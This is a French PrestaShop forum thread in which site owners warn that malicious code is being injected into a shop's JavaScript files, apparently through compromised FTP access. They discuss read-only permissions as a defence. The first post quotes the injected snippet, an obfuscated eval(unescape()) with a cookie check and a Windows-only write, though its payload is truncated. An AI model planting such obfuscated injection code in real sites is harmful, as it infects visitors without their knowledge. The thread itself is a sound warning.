création de sites & seo Posted April 22, 2010 Share Posted April 22, 2010 Bonsoir,Attention il court actuellement un virus qui se greffe sur les fichiers .js du répertoire js de votre site prestashop.Dernier exemple sur 2 de nos sites sur le fichier tools.phpEcriture de ce code en haut de page. ************** code malveillant ******************* eval(unescape("f%......................d")); if(!getCookie('googlecounter')) { expires = new Date(); expires.setTime(expires.getTime() + 86400); setCookie('googlecounter', '1049', expires); if(navigator.appVersion.indexOf('Win')!=-1) { [removed](unescape("<%..................")); } } ************************************* --------------------------------- Code suivant ok ------------------------------- function autoUrl(name, dest) { var loc; var id_list; id_list = document.getElementById(name); loc = id_list.options[id_list.selectedIndex].value; if (loc != 0) location.href = dest+loc; return ; } Alors attention verrouiller vos fichiers js en lecture seul (444)CordialementPhil Link to comment Share on other sites More sharing options...
jeckyl Posted April 22, 2010 Share Posted April 22, 2010 Salut,as tu la moindre idée de comment ces fichiers ont pu être modifié ? Link to comment Share on other sites More sharing options...
création de sites & seo Posted April 22, 2010 Author Share Posted April 22, 2010 resi seulement !! nos fichiers source sont okmais les fichiers sur le ftp étais infectés ?logi ftp flashxp Link to comment Share on other sites More sharing options...
phil46 Posted April 23, 2010 Share Posted April 23, 2010 Re,Est que tu es en ssl sur flashxp ?si on vérouille le fichier JS en 444 alors il y a plus rien qui marche (editeur, jquery etc...)Est ce que quelqu'un peut renseigner si le fichier JS est pas plus protégé que çà c'est grave quand même .......A+phil Did Link to comment Share on other sites More sharing options...
kevin78 Posted January 29, 2013 Share Posted January 29, 2013 Salut j'ai actuellement ce virus... Je me suis connecté sur filezilla, d'un hôtel, peut être, et sûrement dû à ça Du coup, fichier htaccess modifié par un tiers, et tous les fichiers js infectés.... Heureusement que j'ai une sauvegarde, je vais m'en occuper Mais pour éviter ce hack une seconde fois, le fait de mettre en 444 règle tout ?! Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now